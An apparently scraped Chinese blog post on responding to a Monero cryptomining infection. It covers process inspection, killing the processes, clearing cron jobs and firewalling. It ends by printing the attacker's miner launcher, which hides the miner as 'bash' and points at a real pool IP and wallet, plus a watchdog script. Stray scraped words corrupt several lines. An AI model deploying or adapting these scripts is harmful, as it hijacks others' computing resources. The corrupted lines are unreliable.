【處理】服務器遭遇挖礦程序後的處理

時間 2019-12-20

標籤 ***處理服務器遭遇程序處理简体版

原文原文鏈接

早上。
開發反應對外客戶服務器環境異常
空間存儲異常 90個G的空間莫名其妙少了70個G
TOP進程異常多了一個MD和一個BASH爲名的進程分別跑了90-110的cpu
感受像是系統正常進程問了開發開發表示不是正常業務程序，因此百度了進程中的IP地址。發現是一個常見的挖礦***IP，根據***IP百度得知是門羅幣挖礦程序。vim

根據PID找到該進程
[root@bogon ~]# ps -ef|grep 46413
root 46413 1 99 Jan08 ? 56-04:22:04 -bash -a cryptonight -o stratum+tcp://198.251.81.82:3333 -u 49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs -p x
root 80119 79985 0 10:06 pts/1 00:00:00 grep 46413
[root@bogon ~]# ps -ef|grep 47002
root 47002 1 95 Jan08 ? 53-22:30:57 bash -c 1 -t 2 -M stratum+tcp://49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs:x@198.251.81.82:3333/xmr安全

根據以前遭遇過比特幣挖礦程序***案例處理經驗，首先Kill掉這兩個進程，而後查看定時任務中的陌生任務並作清理清理完成後存儲空間恢復正常 CPU恢復正常bash

次日會再次查看若是進程再次出現，根據其餘挖礦程序處理經驗：找出執行文件取消執行受權，刪掉文件，清理進程，清理定時任務（操做順序不要亂）
若是仍是異常清理掉文件後更換root密碼開啓防火牆對***Ip作限制找出其***方式並作相對防護服務器

當天下午記錄：出現這種問題最好排查整個網段的機器此次的程序***就在整個網段的機器中都發現了都作了清理tcp

若是還想作安全防護方面的工做:除了開啓防火牆更換root密碼外
還能夠排查陌生用戶帳號密碼針對***方式作研究（是業務程序有漏洞仍是用的服務工具備漏洞）避免再次被***ide

如下是這個程序涉及的腳本文件供參考（說實話Low的一B）
腳本一：vim ./run
#!/bin/bash工具

proc=nproc
ARCH=uname -m
HIDE=」bash」code

if [ 「$ARCH」 == 「i686」 ]; then
./h32 -s $HIDE ./bash -c 1 -t $proc -M stratum+tcp://49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs:x@198.251.81.82:3333/xmr >>/dev/null &
elif [ 「$ARCH」 == 「x86_64」 ]; then
./h64 -s $HIDE ./bash -c 1 -t $proc -M stratum+tcp://49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs:x@198.251.81.82:3333/xmr >>/dev/null &
fi
echo $! > bash.pid進程

腳本二：vim /tmp/hsperfdata_data_root/upd
#!/bin/sh
if test -r /tmp/hsperfdata_data_root/bash.pid; then
pid=$(cat /tmp/hsperfdata_data_root/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
./run &>/dev/null開發